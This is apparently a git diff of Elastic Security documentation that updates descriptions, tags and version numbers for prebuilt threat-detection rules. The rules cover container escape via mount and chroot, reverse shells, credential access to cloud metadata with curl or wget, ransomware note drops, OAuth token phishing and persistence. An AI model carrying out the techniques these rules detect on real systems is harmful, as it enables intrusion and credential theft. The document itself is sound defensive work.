|<> |Monitors for the execution of a file system mount followed by a chroot execution. Given enough permissions, a user within a container is capable of mounting the root file system of the host, and leveraging chroot to escape its containerized environment. This behavior pattern is very uncommon and should be investigated. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Domain: Container], [Data Source: Elastic Defend], [Data Source: SentinelOne], [Resources: Investigation Guide] |None |106
|<> |This rule monitors for suspicious activities that may indicate an attacker attempting to execute arbitrary code within a PostgreSQL environment. Attackers can execute code via PostgreSQL as a result of gaining unauthorized access to a public facing PostgreSQL database or exploiting vulnerabilities, such as remote command execution and SQL injection attacks, which can result in unauthorized access and malicious actions, and facilitate post-exploitation activities for unauthorized access and malicious actions. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |11
@@ -1772,7 +1798,7 @@ and their rule type is `machine_learning`.
|<> |Identifies port monitor and print processor registry modifications. Adversaries may abuse port monitor and print processors to run malicious DLLs during system boot that will be executed as SYSTEM for privilege escalation and/or persistence, if permissions allow writing a fully-qualified pathname for that DLL.
|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Microsoft Defender for Endpoint], [Resources: Investigation Guide] |None |111
-|<> |This rule detects potential port scanning activity from a compromised host. Port scanning is a common reconnaissance technique used by attackers to identify open ports and services on a target system. A compromised host may exhibit port scanning behavior when an attacker is attempting to map out the network topology, identify vulnerable services, or prepare for further exploitation. This rule identifies potential port scanning activity by monitoring network connection attempts from a single host to a large number of ports within a short time frame. ESQL rules have limited fields available in its alert documents. Make sure to review the original documents to aid in the investigation of this alert. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Discovery], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |6
+|<> |This rule detects potential port scanning activity from a compromised host. Port scanning is a common reconnaissance technique used by attackers to identify open ports and services on a target system. A compromised host may exhibit port scanning behavior when an attacker is attempting to map out the network topology, identify vulnerable services, or prepare for further exploitation. This rule identifies potential port scanning activity by monitoring network connection attempts from a single host to a large number of ports within a short time frame. ESQL rules have limited fields available in their alert documents. Make sure to review the original documents to aid in the investigation of this alert. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Discovery], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |7
|<> |Detects known PowerShell offensive tooling author's name in PowerShell scripts. Attackers commonly use out-of-the-box offensive tools without modifying the code, which may still contain the author artifacts. This rule identifies common author handles found in popular PowerShell scripts used for red team exercises. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: PowerShell Logs], [Resources: Investigation Guide] |None |108
@@ -1850,7 +1876,7 @@ and their rule type is `machine_learning`.
|<> |Identifies known execution traces of the REMCOS Remote Access Trojan. Remcos RAT is used by attackers to perform actions on infected machines remotely. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Command and Control], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Sysmon], [Data Source: SentinelOne], [Data Source: Microsoft Defender for Endpoint], [Data Source: Windows Security Event Logs] |None |1
-|<> |This rule identifies a high number (20) of file creation event by the System virtual process from the same host and with same file name containing keywords similar to ransomware note files and all within a short time period.
|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Impact], [Resources: Investigation Guide], [Data Source: Elastic Defend], [Data Source: Elastic Endgame], [Data Source: Microsoft Defender for Endpoint], [Data Source: Sysmon], [Data Source: SentinelOne] |None |210
+|<> |This rule identifies the creation of multiple files with the same name over SMB by the same user. This behavior may indicate the successful remote execution of ransomware dropping note files to different folders. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Impact], [Resources: Investigation Guide], [Data Source: Elastic Defend] |None |211
|<> |Identifies an incoming SMB connection followed by the creation of a file with a name similar to ransomware note files. This may indicate a remote ransomware attack via the SMB protocol. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Impact], [Resources: Investigation Guide], [Data Source: Elastic Defend] |None |6
@@ -1866,7 +1892,7 @@ and their rule type is `machine_learning`.
|<> |Identifies attempts to install a file from a remote server using MsiExec. Adversaries may abuse Windows Installers for initial access and delivery of malware. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Windows Security Event Logs], [Data Source: Microsoft Defender for Endpoint], [Data Source: Sysmon], [Data Source: SentinelOne], [Data Source: Crowdstrike], [Resources: Investigation Guide] |None |1
-|<> |Identifies attempt to perform session hijack via COM object registry modification by setting the RunAs value to Interactive User. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Data Source: Elastic Endgame], [Data Source: Microsoft Defender for Endpoint], [Data Source: SentinelOne], [Data Source: Sysmon], [Resources: Investigation Guide] |None |3
+|<> |Identifies attempts to perform session hijacking via COM object registry modification by setting the RunAs value to Interactive User. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Data Source: Elastic Endgame], [Data Source: Microsoft Defender for Endpoint], [Data Source: SentinelOne], [Data Source: Sysmon], [Resources: Investigation Guide] |None |4
|<> |This detection rule identifies suspicious network traffic patterns associated with TCP reverse shell activity. This activity consists of a parent-child relationship where a network event is followed by the creation of a shell process. An attacker may establish a Linux TCP reverse shell to gain remote access to a target system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |13
@@ -2250,7 +2276,7 @@ and their rule type is `machine_learning`.
|<> |This rule monitors for Linux Shadow file modifications. These modifications are indicative of a potential password change or user addition event. Threat actors may attempt to create new users or change the password of a user account to maintain access to a system.
|[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Privilege Escalation], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |5
-|<> |Identifies the occurence of files uploaded to SharePoint being detected as Malware by the file scanning engine. Attackers can use File Sharing and Organization Repositories to spread laterally within the company and amplify their access. Users can inadvertently share these files without knowing their maliciousness, giving adversaries opportunities to gain initial access to other endpoints in the environment. |[Domain: Cloud], [Data Source: Microsoft 365], [Tactic: Lateral Movement], [Resources: Investigation Guide] |None |209
+|<> |Identifies the occurrence of files uploaded to SharePoint being detected as Malware by the file scanning engine. Attackers can use File Sharing and Organization Repositories to spread laterally within the company and amplify their access. Users can inadvertently share these files without knowing their maliciousness, giving adversaries opportunities to gain initial access to other endpoints in the environment. |[Domain: Cloud], [Data Source: Microsoft 365], [Tactic: Lateral Movement], [Resources: Investigation Guide] |None |210
|<> |This rule monitors the creation of shared object files by previously unknown processes. The creation of a shared object file involves compiling code into a dynamically linked library that can be loaded by other programs at runtime. While this process is typically used for legitimate purposes, malicious actors can leverage shared object files to execute unauthorized code, inject malicious functionality into legitimate processes, or bypass security controls. This allows malware to persist on the system, evade detection, and potentially compromise the integrity and confidentiality of the affected system and its data. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |13
@@ -2324,7 +2350,7 @@ and their rule type is `machine_learning`.
|<> |Identifies files written to or modified in the startup folder by commonly abused processes. Adversaries may use this technique to maintain persistence. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Sysmon], [Data Source: Microsoft Defender for Endpoint], [Data Source: SentinelOne] |None |314
-|<> |Identifies run key or startup key registry modifications. In order to survive reboots and other system interrupts, attackers will modify run keys within the registry or leverage startup folder items as a form of persistence. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |None |117
+|<> |Identifies run key or startup key registry modifications. In order to survive reboots and other system interrupts, attackers will modify run keys within the registry or leverage startup folder items as a form of persistence.
|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |None |118 |<> |Detects the modification of Group Policy Objects (GPO) to add a startup/logon script to users or computer objects. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Data Source: Active Directory], [Resources: Investigation Guide], [Use Case: Active Directory Monitoring], [Data Source: Windows Security Event Logs] |None |214 @@ -2398,7 +2424,7 @@ and their rule type is `machine_learning`. |<> |A suspicious Endpoint Security parent process was detected. This may indicate a process hollowing or other form of code injection. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Windows Security Event Logs], [Data Source: Microsoft Defender for Endpoint], [Data Source: Sysmon], [Data Source: SentinelOne], [Resources: Investigation Guide] |None |319 -|<> |Identifies rare occurrences of OAuth workflow for a user principal that is single factor authenticated, with an OAuth scope containing user_impersonation for a token issued by Entra ID. Adversaries may use this scope to gain unauthorized access to user accounts, particularly when the sign-in session status is unbound, indicating that the session is not associated with a specific device or session. This behavior is indicative of potential account compromise or unauthorized access attempts. This rule flags when this pattern is detected for a user principal that has not been seen in the last 10 days, indicating potential abuse or unusual activity. |[Domain: Cloud], [Domain: Identity], [Use Case: Threat Detection], [Data Source: Azure], [Data Source: Microsoft Entra ID], [Data Source: Microsoft Entra ID Sign-In Logs], [Tactic: Defense Evasion], [Tactic: Initial Access], [Resources: Investigation Guide] |None |1 +|<> |Identifies rare occurrences of OAuth workflow for a user principal that is single factor authenticated, with an OAuth scope containing user_impersonation for a token issued by Entra ID. Adversaries may use this scope to gain unauthorized access to user accounts, particularly when the sign-in session status is unbound, indicating that the session is not associated with a specific device or session. This behavior is indicative of potential account compromise or unauthorized access attempts. This rule flags when this pattern is detected for a user principal that has not been seen in the last 10 days, indicating potential abuse or unusual activity. |[Domain: Cloud], [Domain: Identity], [Use Case: Threat Detection], [Data Source: Azure], [Data Source: Microsoft Entra ID], [Data Source: Microsoft Entra ID Sign-In Logs], [Tactic: Initial Access], [Resources: Investigation Guide] |None |2 |<> |This detection rule addresses multiple vulnerabilities in the CUPS printing system, including CVE-2024-47176, CVE-2024-47076, CVE-2024-47175, and CVE-2024-47177. Specifically, this rule detects suspicious process command lines executed by child processes of foomatic-rip and cupsd. These flaws impact components like cups-browsed, libcupsfilters, libppd, and foomatic-rip, allowing remote unauthenticated attackers to manipulate IPP URLs or inject malicious data through crafted UDP packets or network spoofing. This can result in arbitrary command execution when a print job is initiated. 
|[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Use Case: Vulnerability], [Tactic: Execution], [Data Source: Elastic Defend], [Data Source: Crowdstrike], [Data Source: SentinelOne], [Data Source: Elastic Endgame], [Resources: Investigation Guide] |None |106 @@ -2460,7 +2486,7 @@ and their rule type is `machine_learning`. |<> |Identifies suspicious Microsoft 365 mail access by ClientAppId. This rule detects when a user accesses their mailbox using a client application that is not typically used by the user, which may indicate potential compromise or unauthorized access attempts. Adversaries may use custom or third-party applications to access mailboxes, bypassing standard security controls. First-party Microsoft applications are also abused after OAuth tokens are compromised, allowing adversaries to access mailboxes without raising suspicion. |[Domain: Cloud], [Domain: Email], [Data Source: Microsoft 365], [Data Source: Microsoft 365 Audit Logs], [Use Case: Threat Detection], [Tactic: Collection], [Resources: Investigation Guide] |None |111 -|<> |Identifies sign-ins on behalf of a principal user to the Microsoft Graph API from multiple IPs using the Microsoft Authentication Broker or Visual Studio Code application. This behavior may indicate an adversary using a phished OAuth refresh token. |[Domain: Cloud], [Domain: Email], [Domain: Identity], [Data Source: Microsoft 365], [Data Source: Microsoft 365 Audit Logs], [Use Case: Identity and Access Audit], [Use Case: Threat Detection], [Resources: Investigation Guide], [Tactic: Defense Evasion] |None |3 +|<> |Identifies sign-ins on behalf of a principal user to the Microsoft Graph API from multiple IPs using the Microsoft Authentication Broker or Visual Studio Code application. This behavior may indicate an adversary using a phished OAuth refresh token. |[Domain: Cloud], [Domain: Email], [Domain: Identity], [Data Source: Microsoft 365], [Data Source: Microsoft 365 Audit Logs], [Use Case: Identity and Access Audit], [Use Case: Threat Detection], [Resources: Investigation Guide], [Tactic: Defense Evasion] |None |4 |<> |Identifies suspicious execution of the Microsoft Antimalware Service Executable (MsMpEng.exe) from non-standard paths or renamed instances. This may indicate an attempt to evade defenses through DLL side-loading or by masquerading as the antimalware process. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Tactic: Execution], [Data Source: Elastic Defend], [Data Source: Sysmon], [Data Source: Microsoft Defender for Endpoint], [Data Source: Crowdstrike], [Resources: Investigation Guide] |None |216 @@ -2468,7 +2494,7 @@ and their rule type is `machine_learning`. |<> |Identifies Mshta.exe spawning a suspicious child process. This may indicate adversarial activity, as Mshta is often leveraged by adversaries to execute malicious scripts and evade detection. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Windows Security Event Logs], [Data Source: Microsoft Defender for Endpoint], [Data Source: Sysmon], [Data Source: SentinelOne], [Data Source: Crowdstrike], [Resources: Investigation Guide] |None |1 -|<> |Identifies separate OAuth authorization flows in Microsoft Entra ID where the same user principal and session ID are observed across multiple IP addresses within a 5-minute window. 
These flows involve the Microsoft Authentication Broker (MAB) as the client application and the Device Registration Service (DRS) as the target resource. This pattern is highly indicative of OAuth phishing activity, where an adversary crafts a legitimate Microsoft login URL to trick a user into completing authentication and sharing the resulting authorization code, which is then exchanged for an access and refresh token by the attacker. |[Domain: Cloud], [Domain: Identity], [Data Source: Azure], [Data Source: Entra ID], [Data Source: Entra ID Sign-in Logs], [Use Case: Identity and Access Audit], [Use Case: Threat Detection], [Resources: Investigation Guide], [Tactic: Initial Access] |None |3 +|<> |Identifies separate OAuth authorization flows in Microsoft Entra ID where the same user principal and session ID are observed across multiple IP addresses within a 5-minute window. These flows involve the Microsoft Authentication Broker (MAB) as the client application and the Device Registration Service (DRS) as the target resource. This pattern is highly indicative of OAuth phishing activity, where an adversary crafts a legitimate Microsoft login URL to trick a user into completing authentication and sharing the resulting authorization code, which is then exchanged for an access and refresh token by the attacker. |[Domain: Cloud], [Domain: Identity], [Data Source: Azure], [Data Source: Entra ID], [Data Source: Entra ID Sign-in Logs], [Use Case: Identity and Access Audit], [Use Case: Threat Detection], [Resources: Investigation Guide], [Tactic: Initial Access] |None |4 |<> |Identifies service creation events of common mining services, possibly indicating the infection of a system with a cryptominer. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Crowdstrike], [Data Source: SentinelOne], [Resources: Investigation Guide] |None |110 @@ -2490,13 +2516,13 @@ and their rule type is `machine_learning`. |<> |Monitors for the generation of a passwd password entry via openssl, followed by a file write activity on the "/etc/passwd" file. The "/etc/passwd" file in Linux stores user account information, including usernames, user IDs, group IDs, home directories, and default shell paths. Attackers may exploit a misconfiguration in the "/etc/passwd" file permissions or other privileges to add a new entry to the "/etc/passwd" file with root permissions, and leverage this new user account to login as root. |[Data Source: Auditd Manager], [Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |7 -|<> |This rule detects the execution of a PATH variable in a command line invocation by a shell process. This behavior is unusual and may indicate an attempt to execute a command from a non-standard location. This technique may be used to evade detection or perform unauthorized actions on the system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |4 +|<> |This rule detects the execution of a PATH variable in a command line invocation by a shell process. This behavior is unusual and may indicate an attempt to execute a command from a non-standard location. This technique may be used to evade detection or perform unauthorized actions on the system. 
|[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |5 |<> |This rule detects suspicious paths mounted on Linux systems. The mount command is used to attach filesystems to the system, and attackers may use it to mount malicious filesystems or directories for data exfiltration or persistence. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |2 |<> |Detects the presence of a portable executable (PE) in a PowerShell script by looking for its encoded header. Attackers embed PEs into PowerShell scripts to inject them into memory, avoiding defences by not writing to disk. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: PowerShell Logs] |None |215 -|<> |Identifies the PowerShell engine being invoked by unexpected processes. Rather than executing PowerShell functionality with powershell.exe, some attackers do this to operate more stealthily. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Resources: Investigation Guide], [Data Source: Elastic Defend] |None |213 +|<> |Identifies the PowerShell engine being invoked by unexpected processes. Rather than executing PowerShell functionality with powershell.exe, some attackers do this to operate more stealthily. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Resources: Investigation Guide], [Data Source: Elastic Defend] |None |214 |<> |A machine learning job detected a PowerShell script with unusual data characteristics, such as obfuscation, that may be a characteristic of malicious PowerShell script text blocks. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Rule Type: ML], [Rule Type: Machine Learning], [Tactic: Execution], [Resources: Investigation Guide] |None |210 @@ -2528,6 +2554,8 @@ and their rule type is `machine_learning`. |<> |Identifies scrobj.dll loaded into unusual Microsoft processes. This usually means a malicious scriptlet is being executed in the target process. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Data Source: Elastic Endgame], [Data Source: Sysmon], [Resources: Investigation Guide] |None |212 +|<> |Identifies attempts to use the SeIncreaseBasePriorityPrivilege privilege by an unusual process. This could be related to hijacking the execution flow of a process via thread priority manipulation. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Data Source: Windows Security Event Logs], [Resources: Investigation Guide] |None |1 + |<> |Identifies the creation of a new Windows service with suspicious Service command values. Windows services typically run as SYSTEM and can be used for privilege escalation and persistence. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Resources: Investigation Guide], [Data Source: Windows Security Event Logs], [Data Source: Windows System Event Logs] |None |114 |<> |A suspicious SolarWinds child process was detected, which may indicate an attempt to execute malicious programs.
|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: SentinelOne], [Resources: Investigation Guide] |None |213 @@ -2560,7 +2588,7 @@ and their rule type is `machine_learning`. |<> |Identifies the execution of the Windows Command Shell process (cmd.exe) with suspicious argument values. This behavior is often observed during malware installation. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Resources: Investigation Guide], [Data Source: Windows Security Event Logs], [Data Source: Sysmon], [Data Source: SentinelOne], [Data Source: Microsoft Defender for Endpoint], [Data Source: Elastic Endgame], [Data Source: Crowdstrike] |None |206 -|<> |Identifies the execution of PowerShell with suspicious argument values. This behavior is often observed during malware installation leveraging PowerShell. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Windows Security Event Logs], [Data Source: Elastic Defend], [Data Source: Sysmon], [Data Source: SentinelOne], [Data Source: Microsoft Defender for Endpoint], [Data Source: Crowdstrike], [Data Source: Elastic Endgame], [Resources: Investigation Guide] |None |208 +|<> |Identifies the execution of PowerShell with suspicious argument values. This behavior is often observed during malware installation leveraging PowerShell. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Windows Security Event Logs], [Data Source: Elastic Defend], [Data Source: Sysmon], [Data Source: SentinelOne], [Data Source: Microsoft Defender for Endpoint], [Data Source: Crowdstrike], [Data Source: Elastic Endgame], [Resources: Investigation Guide] |None |209 |<> |A suspicious Zoom child process was detected, which may indicate an attempt to run unnoticed. Verify process details such as command line, network connections, file writes and associated file signature details as well. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Execution], [Data Source: Elastic Endgame], [Resources: Investigation Guide], [Data Source: Elastic Defend], [Data Source: SentinelOne], [Data Source: Microsoft Defender for Endpoint], [Data Source: Windows Security Event Logs], [Data Source: Crowdstrike], [Data Source: Sysmon] |None |420 @@ -2732,7 +2760,7 @@ and their rule type is `machine_learning`. |<> |This rule detects unusual file creations from a web server parent process. Adversaries may attempt to create files from a web server parent process to establish persistence, execute malicious scripts, or exfiltrate data. ES|QL rules have limited fields available in its alert documents. Make sure to review the original documents to aid in the investigation of this alert. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Execution], [Tactic: Command and Control], [Data Source: Elastic Defend], [Rule Type: BBR] |None |4 -|<> |Identifies an unexpected file being modified by dns.exe, the process responsible for Windows DNS Server services, which may indicate activity related to remote code execution or other forms of exploitation. 
|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Data Source: Elastic Endgame], [Use Case: Vulnerability], [Data Source: Elastic Defend], [Data Source: Sysmon] |None |215 +|<> |Identifies an unexpected file being modified by dns.exe, the process responsible for Windows DNS Server services, which may indicate activity related to remote code execution or other forms of exploitation. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Data Source: Elastic Endgame], [Use Case: Vulnerability], [Data Source: Elastic Defend], [Data Source: Sysmon], [Resources: Investigation Guide] |None |216 |<> |This rule leverages ESQL to detect the execution of unusual file transfer utilities on Linux systems. Attackers may use these utilities to exfiltrate data from a compromised system. ESQL rules have limited fields available in its alert documents. Make sure to review the original documents to aid in the investigation of this alert. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Exfiltration], [Tactic: Execution], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |6 @@ -2752,7 +2780,7 @@ and their rule type is `machine_learning`. |<> |A machine learning job detected a user logging in at a time of day that is unusual for the user. This can be due to credentialed access via a compromised account when the user and the threat actor are in different time zones. In addition, unauthorized user activity often takes place during non-business hours. |[Use Case: Identity and Access Audit], [Use Case: Threat Detection], [Rule Type: ML], [Rule Type: Machine Learning], [Tactic: Initial Access], [Resources: Investigation Guide] |None |107 -|<> |This rule identifies potentially malicious processes attempting to access the cloud service provider's instance metadata service (IMDS) API endpoint, which can be used to retrieve sensitive instance-specific information such as instance ID, public IP address, and even temporary security credentials if role's are assumed by that instance. The rule monitors for various tools and scripts like curl, wget, python, and perl that might be used to interact with the metadata API. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Credential Access], [Tactic: Discovery], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |6 +|<> |This rule identifies potentially malicious processes attempting to access the cloud service provider's instance metadata service (IMDS) API endpoint, which can be used to retrieve sensitive instance-specific information such as instance ID, public IP address, and even temporary security credentials if roles are assumed by that instance. The rule monitors for various tools and scripts like curl, wget, python, and perl that might be used to interact with the metadata API. |[Domain: Endpoint], [Domain: Cloud], [OS: Linux], [Use Case: Threat Detection], [Tactic: Credential Access], [Tactic: Discovery], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |7 |<> |This rule detects when an unusual interactive process is launched inside a container. Interactive processes are typically run in the foreground and require user input, which is unusual behavior for a containerized environment. This activity could indicate an attacker attempting to gain access to the container environment or perform malicious actions.
|[Domain: Container], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |2 @@ -2842,7 +2870,7 @@ and their rule type is `machine_learning`. |<> |A machine learning job has identified a user performing privileged operations in Windows from an uncommon geographical location, indicating potential privileged access activity. This could suggest a compromised account, unauthorized access, or an attacker using stolen credentials to escalate privileges. |[Use Case: Privileged Access Detection], [Rule Type: ML], [Rule Type: Machine Learning], [Tactic: Privilege Escalation], [Resources: Investigation Guide] |None |3 -|<> |This rule leverages the new_terms rule type to detect file creation via a commonly used file transfer service while excluding typical remote file creation activity. This behavior is often linked to lateral movement, potentially indicating an attacker attempting to move within a network. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |3 +|<> |This rule leverages the new_terms rule type to detect file creation via a commonly used file transfer service while excluding typical remote file creation activity. This behavior is often linked to lateral movement, potentially indicating an attacker attempting to move within a network. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |4 |<> |An anomaly detection job has detected a remote file transfer on an unusual directory indicating a potential lateral movement activity on the host. Many Security solutions monitor well-known directories for suspicious activities, so attackers might use less common directories to bypass monitoring. |[Use Case: Lateral Movement Detection], [Rule Type: ML], [Rule Type: Machine Learning], [Tactic: Lateral Movement], [Resources: Investigation Guide] |None |7 @@ -2894,9 +2922,9 @@ and their rule type is `machine_learning`. |<> |Identifies attempts to create new users. This is sometimes done by attackers to increase access or establish persistence on a system or domain. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Windows Security Event Logs], [Data Source: Microsoft Defender for Endpoint], [Data Source: Sysmon], [Data Source: SentinelOne], [Data Source: Crowdstrike] |None |314 -|<> |Identifies when a user is added as an owner for an Azure application. An adversary may add a user account as an owner for an Azure application in order to grant additional permissions and modify the application's configuration using another account. |[Domain: Cloud], [Data Source: Azure], [Use Case: Configuration Audit], [Tactic: Persistence], [Resources: Investigation Guide] |None |105 +|<> |Identifies when a user is added as an owner for an Azure application. An adversary may add a user account as an owner for an Azure application in order to grant additional permissions and modify the application's configuration using another account. |[Domain: Cloud], [Data Source: Azure], [Use Case: Configuration Audit], [Tactic: Persistence], [Resources: Investigation Guide] |None |106 -|<> |Identifies when a user is added as an owner for an Azure service principal. 
The service principal object defines what the application can do in the specific tenant, who can access the application, and what resources the app can access. A service principal object is created when an application is given permission to access resources in a tenant. An adversary may add a user account as an owner for a service principal and use that account in order to define what an application can do in the Azure AD tenant. |[Domain: Cloud], [Data Source: Azure], [Use Case: Configuration Audit], [Tactic: Persistence], [Resources: Investigation Guide] |None |105 +|<> |Identifies when a user is added as an owner for an Azure service principal. The service principal object defines what the application can do in the specific tenant, who can access the application, and what resources the app can access. A service principal object is created when an application is given permission to access resources in a tenant. An adversary may add a user account as an owner for a service principal and use that account in order to define what an application can do in the Azure AD tenant. |[Domain: Cloud], [Data Source: Azure], [Use Case: Configuration Audit], [Tactic: Persistence], [Resources: Investigation Guide] |None |106 |<> |Identifies a user being added to a privileged group in Active Directory. Privileged accounts and groups in Active Directory are those to which powerful rights, privileges, and permissions are granted that allow them to perform nearly any action in Active Directory and on domain-joined systems. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Resources: Investigation Guide], [Use Case: Active Directory Monitoring], [Data Source: Active Directory], [Data Source: Windows Security Event Logs] |None |215 diff --git a/docs/detections/prebuilt-rules/rule-desc-index.asciidoc b/docs/detections/prebuilt-rules/rule-desc-index.asciidoc index deeeefbc8b..f4448394c1 100644 --- a/docs/detections/prebuilt-rules/rule-desc-index.asciidoc +++ b/docs/detections/prebuilt-rules/rule-desc-index.asciidoc @@ -159,6 +159,7 @@ include::rule-details/archive-file-with-unusual-extension.asciidoc[] include::rule-details/at-job-created-or-modified.asciidoc[] include::rule-details/at-exe-command-lateral-movement.asciidoc[] include::rule-details/attempt-to-clear-kernel-ring-buffer.asciidoc[] +include::rule-details/attempt-to-clear-logs-via-journalctl.asciidoc[] include::rule-details/attempt-to-create-okta-api-token.asciidoc[] include::rule-details/attempt-to-deactivate-an-okta-application.asciidoc[] include::rule-details/attempt-to-deactivate-an-okta-network-zone.asciidoc[] @@ -189,7 +190,6 @@ include::rule-details/attempted-private-key-access.asciidoc[] include::rule-details/attempts-to-brute-force-an-okta-user-account.asciidoc[] include::rule-details/authentication-via-unusual-pam-grantor.asciidoc[] include::rule-details/authorization-plugin-modification.asciidoc[] -include::rule-details/azure-ad-global-administrator-role-assigned.asciidoc[] include::rule-details/azure-active-directory-high-risk-user-sign-in-heuristic.asciidoc[] include::rule-details/azure-active-directory-powershell-sign-in.asciidoc[] include::rule-details/azure-alert-suppression-rule-created-or-modified.asciidoc[] @@ -218,8 +218,11 @@ include::rule-details/azure-kubernetes-rolebindings-created.asciidoc[] include::rule-details/azure-network-watcher-deletion.asciidoc[] include::rule-details/azure-openai-insecure-output-handling.asciidoc[] 
